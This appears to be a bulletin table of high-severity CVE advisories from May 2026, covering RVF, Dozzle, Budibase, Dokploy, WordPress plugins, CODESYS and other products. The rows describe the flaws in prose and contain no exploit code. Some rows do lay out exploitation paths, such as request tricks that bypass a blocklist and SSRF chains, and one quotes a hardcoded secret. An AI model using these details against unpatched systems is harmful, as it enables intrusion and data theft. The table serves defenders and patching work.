| airjp73--rvf | RVF (formerly Remix Validated Form) provides easy form validation and state management for React. From 6.0.0 to before 6.0.4 and 7.0.2, setPath in @rvf/set-get (used by @rvf/core to flatten incoming form data into a nested object) does not block the keys __proto__, constructor, or prototype when walking a path. Because field names in submitted form data are passed directly to setPath via preprocessFormData (and through parseFormData / validate), an attacker who can submit a form to a Remix / React Router app using the library can set arbitrary properties on Object.prototype of the running server process. This is a default-reachable prototype pollution primitive: no special configuration is required. Any endpoint that accepts a form via parseFormData or runs a validator created with createValidator is affected. This vulnerability is fixed in 6.0.4 and 7.0.2. | 2026-05-27 | 8.2 | CVE-2026-44483 |
| amir20--dozzle | Dozzle is a realtime log viewer for docker containers. Prior to 10.5.2, in a default dozzle deploy (the documented quickstart, no DOZZLE_AUTH_PROVIDER set), POST /api/notifications/test-webhook is reachable without authentication and forwards an attacker-controlled URL into a WebhookDispatcher that sends an HTTP POST to the supplied URL with attacker-controlled request headers, and returns the response status code AND up to 1MB of the response body to the caller, when the target replies non-2xx. This vulnerability is fixed in 10.5.2. | 2026-05-26 | 8.6 | CVE-2026-45298 |
| Arjun Thakur--Duplicate Page and Post | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Arjun Thakur Duplicate Page and Post allows Blind SQL Injection. This issue affects Duplicate Page and Post: from n/a through 2.9.5. | 2026-05-27 | 8.5 | CVE-2026-49046 |
| auth0--auth0.js | Auth0.js is a client-side JavaScript library for Auth0. From 8.11.0 to 9.32.0, under specific preconditions, the Auth0.js SDK may improperly return user profile information using a valid access token when a specifically crafted invalid ID token is provided. This vulnerability is fixed in 10.0.0. | 2026-05-27 | 7.1 | CVE-2026-42280 |
| Autodesk--3ds Max | A maliciously crafted TIF file, when parsed through Autodesk 3ds Max, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2026-05-26 | 7.8 | CVE-2026-7451 |
| Autodesk--3ds Max | A maliciously crafted WRL file, when parsed through Autodesk 3ds Max, can force a Memory Corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2026-05-26 | 7.8 | CVE-2026-7452 |
| Autodesk--3ds Max | A maliciously crafted WRL file, when parsed through Autodesk 3ds Max, can force a Memory Corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2026-05-26 | 7.8 | CVE-2026-7454 |
| Avaiga--taipy | Taipy 4.1.1, fixed in commit 129fd40, contains a path traversal vulnerability in the ElementLibrary.get_resource() method in taipy/gui/extension/library.py that allows unauthenticated attackers to escape the intended module directory by exploiting an incomplete path containment check using str.startswith() without a trailing path separator. Attackers can send crafted GET requests with path traversal segments targeting a prefix-matching sibling directory on disk, bypassing the directory containment check because Flask's path converter and Werkzeug's WSGI layer preserve the traversal segments while the resolved path still satisfies the flawed startswith comparison, enabling unauthorized file access outside the intended library directory. | 2026-05-27 | 7.5 | CVE-2026-48544 |
| B&R Industrial Automation GmbH--PPT30 Operating System | An Allocation of Resources Without Limits or Throttling vulnerability in the OPC-UA Server used in PPT30 Operating System versions before 1.8.0 may be used by an unauthenticated network-based attacker to permanently prevent legitimate users from interacting with the service. | 2026-05-26 | 7.5 | CVE-2025-11482 |
| babel--babel | Babel is a compiler for writing next generation JavaScript. From 7.12.0 to before 7.29.4 and 8.0.0-alpha.13, using Babel to compile code that was specifically crafted by an attacker can cause Babel to generate output code that executes arbitrary code. This vulnerability is fixed in 7.29.4 and 8.0.0-alpha.13. | 2026-05-26 | 8.2 | CVE-2026-44728 |
| bentoml--BentoML | BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.39, src/bentoml/_internal/container/frontend/dockerfile/templates/base_v2.j2 interpolates docker.base_image raw with no escaping, newline filtering, or validation. A malicious bento.yaml with a multi-line docker.base_image value smuggles arbitrary Dockerfile directives into the generated Dockerfile, and bentoml containerize then runs docker build which executes the injected RUN directives on the victim host. This vulnerability is fixed in 1.4.39. | 2026-05-27 | 8.8 | CVE-2026-44345 |
| bentoml--BentoML | BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.39, a malicious bentofile.yaml containing a newline-injected value in envs[*].name produces unquoted RUN directives in the BentoML-generated Dockerfile. When the victim runs bentoml containerize on the imported bento, those RUN directives execute on the host during docker build. This vulnerability is fixed in 1.4.39. | 2026-05-27 | 8.8 | CVE-2026-44346 |
| better-auth--better-auth | Better Auth is an authentication and authorization library for TypeScript. Prior to 1.4.17 and 1.5.0-beta.9, Better Auth's HTTP rate limiter keyed each request by the exact textual IP address it received in x-forwarded-for (or the configured IP-bearing header). IPv6 clients controlling a typical /64 allocation could rotate through 2^64 distinct source addresses without exhausting the per-address counter, defeating rate limiting on /sign-in/email, /sign-up/email, /forget-password, and every other path the limiter protects. The same bug allowed a single client to vary the textual encoding of one IPv6 address (uppercase, compression, IPv4-mapped, hex-encoded IPv4-in-IPv6) and produce multiple distinct keys. This vulnerability is fixed in 1.4.17 and 1.5.0-beta.9. | 2026-05-28 | 7.3 | CVE-2026-45364 |
| bgermann--CformsII | Cross-Site Request Forgery (CSRF) vulnerability in bgermann CformsII allows Cross Site Request Forgery. This issue affects CformsII: from n/a through 15.1.3. | 2026-05-25 | 7.1 | CVE-2026-39436 |
| brainstormforce--Spectra Gutenberg Blocks Website Builder for the Block Editor | The Spectra Gutenberg Blocks - Website Builder for the Block Editor plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.19.25. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server. Exploitation requires a two-block payload embedded in post content: the first block registers a fake uagb/-prefixed block type with an attacker-specified render_callback, and the second block of the same fake type triggers invocation of that callback via call_user_func() during sequential block rendering in the same page request. | 2026-05-30 | 8.8 | CVE-2026-7465 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.2, packages/worker/src/api/routes/global/scim.ts attaches only two middlewares to the SCIM router: requireSCIM (checks the Enterprise feature flag and SCIM config) and doInScimContext (sets the SCIM request context). There is no role check. Any authenticated user who reaches the worker (BASIC role, workspace-scoped builder, anyone) can call SCIM endpoints and CRUD every user and group in the tenant. This vulnerability is fixed in 3.38.2. | 2026-05-27 | 9.9 | CVE-2026-46425 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.39.0, /api/public/v1/roles/assign is guarded by the builderOrAdmin middleware, which passes any user who is a builder for the app id in the x-budibase-app-id header. That check admits both global builders and workspace-scoped builders (builder.apps set but builder.global unset). The controller then spreads the request body into the SDK call, and the SDK grants builder.global=true or admin.global=true on whichever user ids the caller supplies. Bob, a workspace-scoped builder with an API key, promotes himself or any other user to global admin with one POST. The whole flow is tenant-wide privilege escalation from an app-level role, available to anyone with an Enterprise license that unlocks the EXPANDED_PUBLIC_API feature. This vulnerability is fixed in 3.39.0. | 2026-05-27 | 9 | CVE-2026-48150 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.1, the POST /api/global/users/onboard endpoint is protected by workspaceBuilderOrAdmin middleware, allowing any user with builder permissions to access it. When SMTP email is not configured (the default for self-hosted Budibase instances), this endpoint bypasses the admin-restricted invite flow and directly creates users via bulkCreate, accepting arbitrary admin and builder role assignments from the request body. A builder-level user can create a new global admin account and receive the generated password in the response, achieving full privilege escalation. This vulnerability is fixed in 3.38.1. | 2026-05-27 | 8.8 | CVE-2026-45716 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.1, Budibase exposes a REST API for datasource management. The route PUT /api/datasources/:datasourceId is registered in the authorizedRoutes group with TABLE/READ permission. This is the same authorization level as the read endpoint (GET /api/datasources/:datasourceId). Every authenticated Budibase app user with the BASIC built-in role or higher carries TABLE/WRITE (and therefore TABLE/READ) permissions, and the datasource update controller performs no additional builder check. As a result, any authenticated non-builder app user can submit a PUT request to rewrite a datasource's config object - including the connection host, port, database credentials, or the base url of a REST datasource. Because no network-level SSRF protection is applied to SQL driver connections, redirecting a PostgreSQL/MySQL/MongoDB datasource to an internal IP address succeeds and the attacker can probe or interact with internal services on arbitrary ports. This vulnerability is fixed in 3.38.1. | 2026-05-27 | 8.8 | CVE-2026-45717 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.39.0, the Budibase Text component renders markdown by assigning marked.parse(markdown) straight to innerHTML with no sanitizer (packages/bbui/src/Markdown/MarkdownViewer.svelte:22). Any column a builder binds to a Text component in Markdown mode is a stored-XSS sink writable by every BASIC app user with WRITE on the underlying table. This vulnerability is fixed in 3.39.0. | 2026-05-27 | 8.1 | CVE-2026-48149 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.39.0, the single-datasource GET and PUT routes are guarded by generic TABLE READ, not by Builder/Admin permission or datasource-specific ownership/resource checks. The built-in Basic app user role maps to the WRITE permission set, which includes table read/write and query write. A Basic user can therefore read an existing REST datasource, receive redacted authConfigs values, submit an update that changes only config.url while keeping the redacted placeholders, and trigger an existing saved relative-path REST query. During update, mergeConfigs() restores the old stored secret when it sees the redaction placeholder. During query execution, Budibase prefixes the attacker-controlled datasource config.url to the relative query path and applies the resolved stored auth headers. The result is server-side disclosure of the builder-configured REST Authorization secret to an attacker-controlled listener. This vulnerability is fixed in 3.39.0. | 2026-05-27 | 8.1 | CVE-2026-48152 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.39.0, fetchToken in the OAuth2 SDK makes a POST to a builder-supplied URL with plain node-fetch, skipping the blacklist.isBlacklisted check that every other outbound fetch path in the codebase uses. The Joi schema for the OAuth2 URL has no scheme or host restriction. This vulnerability is fixed in 3.39.0. | 2026-05-27 | 8.5 | CVE-2026-48153 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.35.10, the Plugin URL upload endpoint (POST /api/plugin) validates the submitted URL with a single substring check: url.includes(".tar.gz"). Any URL containing .tar.gz anywhere in the string - in the path, query string, or fragment - passes this check. The URL then proceeds directly to fetchWithBlacklist() with no further validation of host, scheme, or path. Standalone, this vulnerability is blocked by Budibase's default SSRF blacklist, which covers private IP ranges. But the URL validation layer itself is broken regardless, and it directly enables SSRF in two realistic situations: (1) when chained with the BLACKLIST_IPS bypass ([001]), where the blacklist is empty; and (2) when the plugin server follows HTTP redirects from an external URL to an internal target (the default node-fetch behavior with redirect: 'follow'). This vulnerability is fixed in 3.35.10. | 2026-05-27 | 7.7 | CVE-2026-45061 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.34.8, the processUrlFile function in packages/server/src/automations/steps/ai/extract.ts uses fetch(fileUrl) directly without the IP blacklist validation that is consistently applied to all other automation steps. This allows an authenticated user to trigger server-side requests to internal network addresses. This vulnerability is fixed in 3.34.8. | 2026-05-27 | 7.7 | CVE-2026-45548 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.1, the REST datasource integration (packages/server/src/integrations/rest.ts) follows HTTP redirects without re-checking the IP blacklist, allowing an authenticated Builder to access internal services (cloud metadata, databases) by redirecting through an attacker-controlled server. This vulnerability is fixed in 3.38.1. | 2026-05-27 | 7.7 | CVE-2026-45715 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.2, the file upload endpoint POST /api/attachments/process does not enforce active-content restrictions for authenticated users. The checks for dangerous file extensions are conditionally wrapped inside if (isPublicUser) or if (isPublicUser || !env.SELF_HOSTED), meaning any authenticated builder can upload executable web content - SVG files with inline <script> tags, HTML pages with JavaScript, .js modules - which are then stored in the object store (MinIO/S3) with their correct MIME types. When the resulting signed URL is opened by any app user, the browser executes the payload. Impact is persistent stored XSS over all application end users. This vulnerability is fixed in 3.38.2. | 2026-05-27 | 7.6 | CVE-2026-46426 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.3, removeSecrets at packages/server/src/sdk/workspace/datasources/datasources.ts masks only datasource config fields whose schema type is DatasourceFieldType.PASSWORD. The Snowflake integration types its privateKey field as SENSITIVE_LONGFORM, which the filter skips. GET /api/datasources/:datasourceId lives on authorizedRoutes guarded by PermissionType.TABLE + PermissionLevel.READ. An authenticated BASIC user with any app role and call the endpoint and receive the full Snowflake PEM in plaintext. This vulnerability is fixed in 3.38.3. | 2026-05-27 | 7.7 | CVE-2026-46427 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.39.0, the OAuth2 token fetch function in packages/server/src/sdk/workspace/oauth2/utils.ts uses raw fetch(config.url) with no SSRF protection. The safe wrapper fetchWithBlacklist() exists in the same codebase and is used in every other outbound HTTP call (automation steps, plugin downloads, object store), but was not applied to the OAuth2 token endpoint. A user with BUILDER role can point the OAuth2 token URL to internal services (CouchDB, cloud metadata) to exfiltrate sensitive data. This vulnerability is fixed in 3.39.0. | 2026-05-27 | 7.7 | CVE-2026-48146 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.39.0, the OAuth2 token fetch function in packages/server/src/sdk/workspace/oauth2/utils.ts uses raw fetch(config.url) with no SSRF protection. The safe wrapper fetchWithBlacklist() exists in the same codebase and is used in every other outbound HTTP call (automation steps, plugin downloads, object store), but was not applied to the OAuth2 token endpoint. A user with BUILDER role can point the OAuth2 token URL to internal services (CouchDB, cloud metadata) to exfiltrate sensitive data. This vulnerability is fixed in 3.39.0. | 2026-05-27 | 7.7 | CVE-2026-48146 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.39.0, the webhook schema-building endpoint is registered under builderRoutes, but the generic authorization middleware skips authorization for all paths matching /api/webhooks/schema. As a result, an unauthenticated caller can update the body schema for a known webhook and mutate the corresponding automation trigger output schema. This vulnerability is fixed in 3.39.0. | 2026-05-27 | 7.5 | CVE-2026-48151 |
| Bylancer--Zechat | Zechat 1.5 contains an SQL injection vulnerability that allows unauthenticated attackers to extract database information by injecting SQL code through the uname parameter. Attackers can send crafted requests to profile.php with UNION-based SQL injection payloads to retrieve table names, column names, and sensitive data from the information_schema database. | 2026-05-29 | 8.2 | CVE-2018-25382 |
| Canonical--Multipass | An issue was discovered in Canonical Multipass before version 1.16.3. The host-side SFTP server component (sshfs_server), which executes with root privileges on the host, contains a path containment bypass vulnerability within its validate_path function in src/sshfs_mount/sftp_server.cpp. The function performs a plain string prefix comparison on requested paths without path separator validation or dot-dot (..) normalization. A local attacker with root privileges inside a guest virtual machine can bypass the FUSE layer by injecting raw SFTP frames (such as an SSH_FXP_OPEN request) directly into the sshfs_server process stdin/stdout pipes via procfs. By supplying a path containing directory traversal sequences that match the allowed mount prefix, the attacker can force the host-side root process to resolve the traversal and open files outside the designated mount boundary. This allows a guest-side user to read arbitrary files on the host filesystem, resulting in a virtual machine escape. | 2026-05-28 | 8.4 | CVE-2026-49238 |
| Canonical--Multipass | An issue was discovered in Canonical Multipass for macOS before version 1.16.3 due to an incomplete fix for CVE-2025-5199. While the patch in version 1.16.0 updated the ownership of the multipassd daemon binary to root:wheel, five co-located binaries (multipass, qemu-img, qemu-system-aarch64, qemu-system-x86_64, and sshfs_server) in /Library/Application Support/com.canonical.multipass/bin/ retain ownership by the installing user and remain writable. Because the root LaunchDaemon (com.canonical.multipassd.plist) configures a PATH environment variable that prioritizes this user-writable directory and invokes these auxiliary binaries by their bare names, a local attacker can replace an auxiliary binary (such as qemu-img) with a malicious wrapper. When the root daemon subsequently triggers the binary during routine execution (e.g., via multipass launch), the malicious code executes with root privileges, leading to local privilege escalation. | 2026-05-28 | 7.8 | CVE-2026-49237 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8 contains AppArmor SAUCE patches which fail to acquire a lock when modifying a linked list. An unprivileged local user could trigger the race condition that can lead to a use-after-free (UAF) and, theoretically, arbitrary code execution. | 2026-05-28 | 7.8 | CVE-2026-47331 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain AppArmor SAUCE patches which can potentially incorrectly compute the size of an internal buffer, leading to a heap memory out-of-bounds read in notification handling code. The bug can be triggered by an unprivileged local user and can result in invalid data being processed by the AppArmor DFA policy engine. | 2026-05-28 | 7.8 | CVE-2026-47333 |
| chatwoot--chatwoot | Chatwoot is a customer engagement suite. From 2.2.0 to before 4.11.2, a SQL injection vulnerability exists in the conversation and contact filter APIs. When filtering by a custom attribute of type date or number using the is_greater_than or is_less_than operators, user-supplied values in the values field of the filter payload are interpolated directly into the SQL query without parameterization. Any authenticated user with access to an account can exploit this to execute arbitrary SQL via time-based blind injection. This affects /api/v1/accounts/{account_id}/conversations/filter, /api/v1/accounts/{account_id}/contacts/filter, and /api/v1/accounts/{account_id}/custom_attribute_definitions. This vulnerability is fixed in 4.11.2. | 2026-05-26 | 8.5 | CVE-2026-44706 |
| checkpoint--Quantum Security Gateway | The VPN service may mishandle an unexpected IKE fragment value received on the IKE port 500/UDP during the early stage of a connection attempt. This can cause the service to terminate unexpectedly, resulting in denial of service (temporary disruption of VPN-related functionality). | 2026-05-26 | 8.1 | CVE-2026-48131 |
| checkpoint--Quantum Security Gateway | The Security Gateway does not correctly validate a length value in certain IKE packets when NAT-T is used (4500/UDP). As a result, a specially crafted or malformed packet can cause the VPN processing service to terminate unexpectedly, leading to denial of service (temporary interruption of VPN negotiations/traffic). | 2026-05-26 | 8.1 | CVE-2026-48132 |
| checkpoint--Quantum Security Gateway | When the Identity Awareness blade is enabled with Browser-Based Authentication, an unauthenticated user may be able to read certain internal files on the Security Gateway. | 2026-05-26 | 7.5 | CVE-2026-48133 |
| cli--cli | GitHub CLI (gh) is GitHub's official command line tool. Prior to 2.93.0, GitHub CLI incorrectly includes authorization header in API requests to TUF repository mirrors via gh attestation, gh release verify, and gh release verify-asset commands. The CLI uses a shared HTTP client with an authentication layer that automatically attaches tokens to outgoing requests. This layer lacks accurate host detection and can incorrectly attribute the target host, providing it with a token it should never receive. Specifically, the host normalization logic collapses any *.github.com subdomain to github.com, so a request to tuf-repo.github.com (a GitHub Pages site, not a GitHub API endpoint) is treated as a request to github.com and receives the user's github.com token. For hosts that don't match github.com or a known GHES instance at all, the resolver falls back to GH_ENTERPRISE_TOKEN if set. The gh attestation, gh release verify and gh release verify-asset commands fetch data from several external hosts as part of their normal operation (TUF metadata from tuf-repo.github.com and tuf-repo-cdn.sigstore.dev, artifact bundles from Azure Blob Storage). Because these requests go through the same authenticated HTTP client, the token is sent to all of them. This vulnerability is fixed in 2.93.0. | 2026-05-29 | 7.4 | CVE-2026-48501 |
| code-projects--Online Hospital Management System | A security vulnerability has been detected in code-projects Online Hospital Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /patient.php. Such manipulation of the argument editid leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2026-05-31 | 7.3 | CVE-2026-10186 |
| code-projects--Online Music Site | A vulnerability was detected in code-projects Online Music Site 1.0. This vulnerability affects unknown code of the file /Administrator/PHP/AdminEditAlbum.php. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. | 2026-05-31 | 7.3 | CVE-2026-10178 |
| code-projects--Project Management System | A security vulnerability has been detected in code-projects Project Management System 1.0. Affected is an unknown function of the file chk.php of the component Login. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. | 2026-05-26 | 7.3 | CVE-2026-9584 |
| code-projects--Student Details Management System | A vulnerability was detected in code-projects Student Details Management System 1.0. This affects an unknown function of the file /index.php. Performing a manipulation of the argument roll results in sql injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2026-05-30 | 7.3 | CVE-2026-10110 |
| code100x--code100x | code100x contains an authentication bypass vulnerability in the Mobile API that allows unauthenticated attackers to impersonate arbitrary users by supplying a crafted JSON payload in the 'g' HTTP header. The middleware in middleware.ts skips identity header generation when an Auth-Key header is present without validating its value, allowing attackers to inject a spoofed user identity header that the downstream route handler in the mobile courses endpoint accepts as trusted, granting unauthorized access to course data belonging to any enrolled user or administrator. | 2026-05-26 | 8.2 | CVE-2026-8890 |
| CodeRevolution--Crawlomatic Multipage Scraper Post Generator | The Crawlomatic Multipage Scraper Post Generator plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.7.2 via the filter_content function. This is due to passing the attacker-supplied 'callback_raw' shortcode attribute directly into call_user_func() with no sanitization or allowlist validation, relying solely on an is_callable() check that permits dangerous PHP built-ins such as system, shell_exec, exec, passthru, and assert. This makes it possible for authenticated attackers, with author-level access and above, to execute code on the server. An identical sink exists for the 'callback' attribute, providing a second independent vector through the same shortcode. | 2026-05-28 | 8.8 | CVE-2026-9009 |
| CODESYS--CODESYS Control RTE (SL) | The affected products insufficiently verify authorization when deleting user accounts. An authenticated, low-privileged remote user can exploit this vulnerability to delete other users, including those with higher privileges. | 2026-05-26 | 8.1 | CVE-2026-8046 |
| CODESYS--CODESYS Control RTE (SL) | The affected products perform improper length checking when parsing incoming HTTP requests, resulting in a size-limited out-of-bounds write. An unauthenticated remote attacker can exploit this flaw to cause a denial of service via a system crash on the affected device. | 2026-05-26 | 7.5 | CVE-2026-8047 |
| CODESYS--CODESYS Development System | The affected product creates a directory with insecure default permissions during administrative installation. This allows a low-privileged local attacker to modify a temporary file defining the components to be installed, enabling local privilege escalation by forcing the deployment of arbitrary components. | 2026-05-26 | 7.8 | CVE-2026-44468 |
| CODESYS--CODESYS Development System | The affected product extracts installation files to a temporary directory with incorrect default permissions during administrative installation. A low-privileged local attacker can exploit a TOCTOU race condition with a practical time window to replace verified files with malicious ones before installation, resulting in local privilege escalation. | 2026-05-26 | 7.8 | CVE-2026-44469 |
| Commentcamarche--Free MP3 CD Ripper | Free MP3 CD Ripper 2.8 contains a stack-based buffer overflow vulnerability in WMA file processing that allows local attackers to bypass DEP protection via structured exception handling manipulation. Attackers can craft a malicious WMA file that triggers the overflow when loaded through the Convert function, enabling execution of arbitrary code through ROP chain gadgets and shellcode injection. | 2026-05-29 | 8.4 | CVE-2018-25383 |
| CP Plus--CP-UNR-108F1 Hardware | A stored cross-site scripting (XSS) vulnerability exists in certain 1xxx series NVR devices due to insufficient sanitization of user-supplied input in specific functional modules. Attackers can inject malicious scripts, which are then persistently stored on the device backend. When administrators or users access affected pages, the stored scripts are executed in their browsers, leading to potential session hijacking, unauthorized actions, or data theft. | 2026-05-29 | 8.4 | CVE-2026-6824 |
| Crocoblock--JetEngine | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Crocoblock JetEngine allows SQL Injection. This issue affects JetEngine: from n/a through 3.8.8.1. | 2026-05-25 | 9.3 | CVE-2026-42774 |
| croixhaug--Appointment Booking Calendar Simply Schedule Appointments Booking Plugin | The Appointment Booking Calendar - Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'append_where_sql' parameter in all versions up to, and including, 1.6.11.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The /appointments/bulk REST endpoint is reachable by unauthenticated attackers because its permission check accepts a public nonce that is embedded in the booking widget's frontend JavaScript (ssa.api.public_nonce) and visible to all site visitors; exploitation requires issuing the request as a PUT with an application/x-www-form-urlencoded body so that PHP's superglobals are not populated and the blocklist check silently passes. | 2026-05-28 | 7.5 | CVE-2026-7797 |
| cservit--affiliate-toolkit Multi-Network Affiliate & Amazon Product Display | The affiliate-toolkit plugin for WordPress is vulnerable to remote code execution in all versions up to, and including, 3.8.5. This is due to the plugin using the BladeOne templating engine's runString() method which compiles user-supplied template content into PHP code and executes it via eval() without sanitization or sandboxing. This makes it possible for authenticated attackers, with Editor-level access and above, to execute arbitrary code on the server by injecting PHP into a plugin template. | 2026-05-27 | 7.2 | CVE-2026-6169 |
| cssigniterteam--GutenBee Gutenberg Blocks | The GutenBee - Gutenberg Blocks plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 2.20.1 via the gutenbee_file_and_ext_json function. This is due to a flawed strpos() substring check that only verifies whether the filename contains the string '.json' rather than confirming the filename ends with a .json extension, allowing double-extension filenames like shell.json.php to bypass validation. This makes it possible for authenticated attackers, with author-level access and above, to upload files that may be executable, which makes remote code execution possible. | 2026-05-28 | 8.8 | CVE-2026-9227 |
| czlonkowski--n8n-mcp | n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. Prior to 2.51.2, when ENABLE_MULTI_TENANT=true, the HTTP transport documents that the target n8n instance is selected per-request from x-n8n-url / x-n8n-key headers. Requests that omitted those headers - or supplied only one of them - silently fell back to the process-level N8N_API_URL / N8N_API_KEY credentials configured for the operator's own n8n instance. As a result, an authenticated MCP tenant could cause n8n management calls to execute against the operator's instance instead of its own. This affects HTTP-mode deployments of n8n-mcp that are run as a shared multi-tenant service. Single-tenant deployments (ENABLE_MULTI_TENANT unset or false) are not affected. This vulnerability is fixed in 2.51.2. | 2026-05-29 | 8.1 | CVE-2026-45707 |
| Danelec--MacGregor Voyage Data Recorder (VDR) G4e | Danelec MacGregor Voyage Data Recorder includes default accounts with hard-coded credentials. | 2026-05-29 | 8.3 | CVE-2026-42929 |
| Danelec--MacGregor Voyage Data Recorder (VDR) G4e | The Danelec MacGregor Voyage Data Recorder device includes a default username and password, with no enforced password change. | 2026-05-29 | 8.3 | CVE-2026-42941 |
| Das--Parking Management System | A vulnerability was identified in Das Parking Management System åœè½¦åœºç®¡ç†ç³»ç»Ÿ 6.2.0. This affects the function xp_cmdshell of the file ParkingRecord/ExportParkingRecords of the component API Endpoint. The manipulation of the argument Value leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 7.3 | CVE-2026-9551 |
| Das--Parking Management System | A security flaw has been discovered in Das Parking Management System åœè½¦åœºç®¡ç†ç³»ç»Ÿ 6.2.0. This vulnerability affects unknown code of the component Search API Endpoint. The manipulation of the argument Value results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 7.3 | CVE-2026-9552 |
| DataDog--guarddog | GuardDog is a CLI tool to identify malicious PyPI packages. From 1.0.0 to 2.9.0, the programmatic remote project scanning path rewrites attacker-controlled repository URLs using a blind string replacement and then sends the caller's GitHub credentials with the resulting request. This allows an attacker who can influence the scanned repository URL to trigger SSRF and capture the GH_TOKEN used by GuardDog. This vulnerability is fixed in . | 2026-05-27 | 8.2 | CVE-2026-44971 |
| Delta Electronics--DIAView | There is a mitigation bypass / (incomplete fix) for CVE-2025-62582 (Unauthenticated Remote Database Access) An unauthenticated remote attacker can access configured databases in a DIAView project. | 2026-05-26 | 9.8 | CVE-2026-9642 |
| Deltasql--Delta Sql | Delta Sql 1.8.2 contains an arbitrary file upload vulnerability that allows unauthenticated attackers to upload malicious files by sending POST requests to docs_upload.php with crafted multipart form data. Attackers can upload PHP files with arbitrary content to the upload directory and execute them on the server for remote code execution. | 2026-05-30 | 9.8 | CVE-2018-25412 |
| devsabbirahmed--Firebase Support & Chat Management | The Firebase Support & Chat Management plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.1.1. This is due to the `firebase_auth()` function authenticating the request as the WordPress user whose email is supplied in the `user_email` POST parameter without verifying ownership of that email (no Firebase ID token signature/issuer/audience verification). This makes it possible for authenticated attackers, with Subscriber-level access and above, to log in as an arbitrary existing user - including an Administrator - by submitting that user's email address to the `acb_firebase_auth` AJAX action, resulting in full account takeover. | 2026-05-27 | 8.8 | CVE-2026-8787 |
| dglingren--Media Library Assistant | The Media Library Assistant plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.35 This is due to missing nonce verification on the bulk action handlers in the settings tab handlers. This makes it possible for unauthenticated attackers to trick an administrator into performing bulk delete, edit, or purge operations on plugin settings and attachment metadata via a forged request. | 2026-05-29 | 8.1 | CVE-2026-6075 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). From 0.27.0 to before 0.29.3, a hardcoded BETTER_AUTH_SECRET fallback ("better-auth-secret-123456789") lets an unauthenticated attacker forge email verification JWTs, trigger auto-sign-in as admin, and execute commands on the host via the built-in SSH terminal. This vulnerability is fixed in 0.29.3. | 2026-05-29 | 10 | CVE-2026-45631 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.29.2 and earlier, Dokploy constructs shell commands using JavaScript template literals and executes them via child_process.exec() (which runs through /bin/sh -c). User-supplied branch names, repository URLs, and Docker credentials are interpolated directly into these commands without escaping. This requires an authenticated user with application create/edit privileges. | 2026-05-29 | 9.6 | CVE-2026-45628 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.28.8 and earlier, authenticated OS command injection in the /listen-deployment WebSocket endpoint allows any organization member to execute arbitrary system commands on remote servers managed by Dokploy, leading to full server compromise. | 2026-05-29 | 9.9 | CVE-2026-45629 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.28.8 and earlier, authenticated OS command injection in the application.updateTraefikConfig tRPC endpoint allows admin/owner users to execute arbitrary system commands on remote servers via unsanitized echo shell interpolation. | 2026-05-29 | 9 | CVE-2026-45630 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.26.7 and earlier, the schedule router does not enforce organization/role checks. As a result, any authenticated user can create, update, run, or delete schedules belonging to other organizations if they know the scheduleId/serverId. Schedule types server and dokploy-server write and execute scripts on the host or remote servers, enabling RCE on the Dokploy host or a target server. | 2026-05-29 | 9.9 | CVE-2026-45632 |
